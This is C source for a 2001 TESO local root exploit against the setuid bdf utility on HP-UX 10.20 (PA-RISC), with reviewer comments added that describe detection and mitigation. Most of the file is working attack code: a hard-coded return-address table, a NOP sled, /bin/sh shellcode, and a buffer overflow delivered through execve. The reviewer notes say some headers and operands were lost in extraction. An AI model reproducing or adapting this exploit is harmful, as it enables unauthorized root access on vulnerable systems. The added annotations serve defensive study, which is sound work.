/* 7350bdf - hppa/hpux bdf local root exploit
 *
 * TESO CONFIDENTIAL - SOURCE MATERIALS
 *
 * This is unpublished proprietary source code of TESO Security.
 *
 * The contents of these coded instructions, statements and computer
 * programs may not be disclosed to third parties, copied or duplicated in
 * any form, in whole or in part, without the prior written permission of
 * TESO Security. This includes especially the Bugtraq mailing list, the
 * www.hack.co.za, PacketStorm Security and SecuriTeam websites and any public
 * exploit archive.
 *
 * (C) COPYRIGHT TESO Security, 2001
 * All Rights Reserved
 *
 *****************************************************************************
 * found by scut 2001/08/21, yah yah i know its old
 * kudos to caddis for enlightning me about quadrants
 *
 */

/*
 * Reviewer notes (defensive reading of this historical proof of concept):
 *
 *  - main() builds a single over-long argument for /usr/bin/bdf: an
 *    alignment pad of 'A', a PA-RISC NOP sled, three 32-bit values stored
 *    at fixed offsets, and the shellcode, then execs bdf with that argument
 *    and an empty environment. Every offset and address comes from the one
 *    entry in the target table below; nothing is probed at run time, so the
 *    table is the whole "exploit" and it only matches that one build.
 *  - Detection angle: an exec of bdf whose first argument is ~1200 bytes of
 *    mostly 0x41 and repeated 0x0b 0x39 0x02 0x99 is not something a user
 *    types; the program also prints a fixed banner before the exec.
 *  - bdf is presumably setuid root on the affected release (that is what
 *    makes this "local root") - removing the setuid bit or updating the
 *    binary is what takes the overflow out of reach.
 *  - The header names in the three #include lines were lost when this
 *    listing was extracted; the code uses stdio, stdlib, string and
 *    unistd/getopt functions.
 */

#define VERSION "0.0.1"

#include
#include
#include

void usage (char *progname);

/* One target description: layout of the argument buffer and the values
 * written into it.  Offsets are byte positions within buf[] in main(). */
typedef struct {
	char *		desc;
	int		bsize;		/* overall buffer size */
	int		align;		/* leading pad of 'A' before the NOP sled */

	/* the return address has to
	 *
	 * a) lie within the shared library quadrant (within libc)
	 * b) point to some code snippet that looks like this:
	 *
	 *     0xc0108ea8:  ldw -18(sr0,sp),rp
	 *     0xc0108eac:  ldsid (sr0,rp),r1
	 *     0xc0108eb0:  mtsp r1,sr0
	 *     0xc0108eb4:  be,n 0(sr0,rp)
	 *
	 * this sets the space id accordingly, so we can return into
	 * the stack
	 */
	int		ret_pos;
	unsigned int	ret_addr;

	/* this is the address our code lies at, and the position where to
	 * put it */
	int		code_pos;
	unsigned int	code_addr;

	/* at least HP-UX 10.20 needs a sane value at a place, which i
	 * happened to call r15_val, since it is passed through %r15 */
	int		r15_pos;
	unsigned int	r15_val;
} t_elem;

/* Field order per entry:
 *   desc, bsize, align, ret_pos, ret_addr, code_pos, code_addr, r15_pos, r15_val
 * With align == 3 the NOP fill starts at buf[3], so the three 4-byte stores
 * at 1040, 1192 and 1196 land on word boundaries relative to buf.
 * The list is terminated by an entry whose desc is NULL. */
t_elem targets[] = {
	/* tested on: HP-UX calina B.10.20 A 9000/735 -sc */
	{ "HP-UX 10.20", 1200, 3, 1196, 0xc0108ea8, 1192, 0x7b03a220, 1040, 0x7b03a4f8 },
	{ NULL, 0, 0, 0, 0, 0 },
};

/* LSD shellcode, thanks buddies */
/* One 4-byte PA-RISC instruction used to fill the sled; it has no NUL byte. */
unsigned char nop[] = "\x0b\x39\x02\x99"; /* xor %r25,%r25,%r25 */

/* The trailing 'A' of "/bin/shA" keeps the literal free of NUL bytes; the
 * stbs %r0,7(%r26) below is what turns it into the terminator at run time.
 * The ldil/ble pairs are the two system-call entries (per the instruction
 * comments); the label operand of the "bl" was lost in extraction. */
unsigned char shellcode[] =
	"\x0b\x5a\x02\x9a"	/* xor %r26,%r26,%r26 */
	"\x0b\x39\x02\x99"	/* xor %r25,%r25,%r25 */
	"\x0b\x18\x02\x98"	/* xor %r24,%r24,%r24 */
	"\x20\x20\x08\x01"	/* ldil L%0xc0000004,%r1 */
	"\xe4\x20\xe0\x08"	/* ble R%0xc0000004(%sr7,%r1) */
	"\xb4\x16\x70\xfc"	/* addi,> 0x7e,%r0,%r22 */
	"\xeb\x5f\x1f\xfd"	/* bl ,%r26 */
	"\x0b\x39\x02\x99"	/* xor %r25,%r25,%r25 */
	"\xb7\x5a\x40\x22"	/* addi,< 0x11,%r26,%r26 */
	"\x0f\x40\x12\x0e"	/* stbs %r0,7(%r26) */
	"\x20\x20\x08\x01"	/* ldil L%0xc0000004,%r1 */
	"\xe4\x20\xe0\x08"	/* ble R%0xc0000004(%sr7,%r1) */
	"\xb4\x16\x70\x16"	/* addi,> 0xb,%r0,%r22 */
	"/bin/shA";

/* Print usage to stderr and exit with failure.  The option placeholder
 * after "-t" was lost in extraction (the literal is kept as found). */
void
usage (char *progname)
{
	fprintf (stderr, "usage: %s [-t ]\n\n", progname);
	fprintf (stderr, "-t num\tchoose target (0 for list)\n\n");

	exit (EXIT_FAILURE);
}

/* Entry point: parse -t, list or select a target, build buf[] from the
 * target entry, then execve /usr/bin/bdf with buf as argv[1].
 * Returns only on execve failure (exit status EXIT_FAILURE). */
int
main (int argc, char *argv[])
{
	char		c;		/* getopt returns int; the EOF compare below
					 * only works where char is signed */
	int		b_walker;	/* byte offset while filling the NOP sled */
	unsigned int *	iptr;		/* used for the three 4-byte stores */
	unsigned char	buf[2048];	/* the argument handed to bdf */
	char *		n_argv[3];
	char *		n_env[1];
	int		tgt_num = -1;	/* 1-based target index; 0 lists targets */
	t_elem *	tgt;

	printf ("7350bdf - hppa/hpux bdf local root exploit\n"
		"-scut\n\n");

	while ((c = getopt (argc, argv, "t:")) != EOF) {
		switch (c) {
		case 't':
			tgt_num = atoi (optarg);
			break;
		default:
			usage (argv[0]);
			break;
		}
	}

	if (tgt_num < 0)
		usage (argv[0]);

	if (tgt_num == 0) {
		printf ("num . description\n");
		printf ("----+--------------------------------\n");

		/* walks targets[] up to the NULL-desc sentinel */
		for ( ; targets[tgt_num].desc != NULL ; ++tgt_num)
			printf ("%3d | %s\n", tgt_num + 1, targets[tgt_num].desc);

		printf (" '\n");

		exit (EXIT_SUCCESS);
	}

	/* element count includes the sentinel, so the largest accepted
	 * tgt_num maps (after the -1 below) onto the last real entry */
	if (tgt_num >= (sizeof (targets) / sizeof (t_elem)))
		usage (argv[0]);

	tgt = &targets[tgt_num - 1];
	printf ("using: %s\n", tgt->desc);

	memset (buf, '\0', sizeof (buf));

	/* set nops */
	if (tgt->align != 0)
		memset (buf, 'A', tgt->align);

	/* fills one nop word per iteration, from align up to bsize - align;
	 * for the table entry that is buf[3] .. buf[1198] */
	for (b_walker = tgt->align ; b_walker < (tgt->bsize - tgt->align) ; b_walker += 4) {
		buf[b_walker] = nop[0];
		buf[b_walker + 1] = nop[1];
		buf[b_walker + 2] = nop[2];
		buf[b_walker + 3] = nop[3];
	}

	/* NOTE(review): the three stores below go through an unsigned int *
	 * into a char array; the offsets used are multiples of 4, but buf
	 * itself only has char alignment, so this relies on the compiler
	 * placing buf on a word boundary. */
	if (tgt->r15_pos != 0) {
		iptr = (unsigned int *) &buf[tgt->r15_pos];
		*iptr = tgt->r15_val;		/* sane %r15 */
	}

	iptr = (unsigned int *) &buf[tgt->code_pos];
	*iptr = tgt->code_addr;		/* real retaddr */

	iptr = (unsigned int *) &buf[tgt->ret_pos];
	*iptr = tgt->ret_addr;		/* yay! */

	/* we assume the buffer is 1024 bytes long */
	/* shellcode is copied so that its last byte sits at buf[1022] */
	memcpy (&buf[1023] - strlen (shellcode), shellcode, strlen (shellcode));

	/* terminate after bsize bytes; the 'A' ending the shellcode string
	 * is still present at this point (it is only zeroed at run time) */
	buf[tgt->bsize] = '\0';

	/* NOTE(review): n_argv[2] is never assigned, so the argv vector handed
	 * to execve is not reliably NULL-terminated - it depends on whatever
	 * is on the stack at that slot. */
	n_argv[0] = "/usr/bin/bdf";
	n_argv[1] = buf;
	n_env[0] = NULL;

	/* empty environment; execve only returns on failure */
	execve (n_argv[0], n_argv, n_env);

	exit (EXIT_FAILURE);
}